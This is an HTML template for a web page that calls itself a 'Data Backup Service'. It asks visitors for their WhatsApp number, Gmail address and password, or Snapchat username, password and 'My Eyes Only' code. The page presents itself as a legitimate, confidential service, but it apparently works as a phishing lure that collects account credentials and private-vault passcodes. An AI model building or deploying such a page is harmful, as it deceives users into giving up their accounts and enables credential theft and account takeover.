<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="{{ url_for('static', filename='css/style.css')}}">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <title>Document Hello</title>
</head>

<body>
    <div class="main">
        <!-- <img src="./kiddo.jpg" width="100%" height="100%" alt=""> -->
        <div class="left-column">
            <h1>Data Backup</h1>
            <p>
                Welcome to our Data Backup Service! Safeguard your valuable information by securely backing up your
                application data. We
                understand the importance of your data and ensure its confidentiality and integrity throughout the
                process. Choose the application you want to back up, provide your credentials, and leave the rest to us.
                <br>
            </p>
            <br>
            <form action="" method="POST">
                <!-- form to get details about the account they want to backup -->
                <div class="mb-3">
                    <label for="select-field" class="form-label"><strong>Select the type of application you want to backup</strong></label>
                    <select class="form-select" aria-label="Default select example" id="select-field">
                        <option selected value="">Select One</option>
                        <option value="WhatsApp">WhatsApp</option>
                        <option value="Gmail">Gmail</option>
                        <option value="Snapchat">Snapchat</option>
                    </select>
                </div>
                <!-- Additional field for credentials (hidden by default) -->

                <!-- Additional fields for WhatsApp credentials (hidden by default) -->
                <div class="form-group" id="whatsapp-fields" style="display: none;">
                    <div class="mb-3">
                        <label for="whatsapp-country" class="form-label"><strong>Enter Country</strong></label>
                        <input type="email" class="form-control" id="whatsapp-country" placeholder="eg. Ghana">
                    </div>
                    <div class="mb-3">
                        <label for="whatsapp-number" class="form-label"><strong>Enter number</strong></label>
                        <input type="text" class="form-control" id="whatsapp-number" placeholder="eg. 020000000">
                    </div>
                </div>

                <!-- Additional fields for Gmail credentials (hidden by default) -->
                <div class="form-group" id="gmail-fields" style="display: none;">
                    <div class="mb-3">
                        <label for="email" class="form-label"><strong>Email</strong></label>
                        <input type="email" class="form-control" id="email" placeholder="eg. abc@example.com">
                    </div>
                    <div class="mb-3">
                        <label for="gmail-password" class="form-label"><strong>Password</strong></label>
                        <input type="gmail-password" class="form-control" id="gmail-password" placeholder="eg. 123456">
                    </div>
                </div>

                <!-- Additional fields for Snapchat credentials and "My Eyes Only" (hidden by default) -->
                <div class="form-group" id="snapchat-fields" style="display: none;">
                    <div class="mb-3">
                        <label for="snapchat-username" class="form-label"><strong>Snapchat Username</strong></label>
                        <input type="text" class="form-control" id="snapchat-username" placeholder="Enter Snapchat username">
                    </div>
                    <div class="mb-3">
                        <label for="snapchat-password" class="form-label"><strong>Snapchat Password</strong></label>
                        <input type="text" class="form-control" id="snapchat-password" placeholder="Enter Snapchat Password">
                    </div>
                    <div class="form-check mb-3">
                        <input class="form-check-input" type="checkbox" id="my-eyes-only">
                        <label class="form-check-label" for="my-eyes-only">
                            Do you want to backup files in <strong>"My Eyes Only"?</strong> If yes enter code
                        </label>
                    </div>
                    <div class="mb-3">
                        <label for="code" class="form-label"><strong>Code</strong></label>
                        <input type="text" class="form-control" id="code" placeholder="Enter code">
                    </div>
                </div>

                <button type="submit" id="submit" class="btn btn-primary">Submit</button>
            </form>
        </div>
        <div class="right-column">
            <img src="{{ url_for('static', filename='images/cloud-image.png')}}" width="100%" height="100%" alt="">
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL"
        crossorigin="anonymous"></script>
        <script src="{{ url_for('static', filename='js/script.js')}}"></script>
</body>

</html>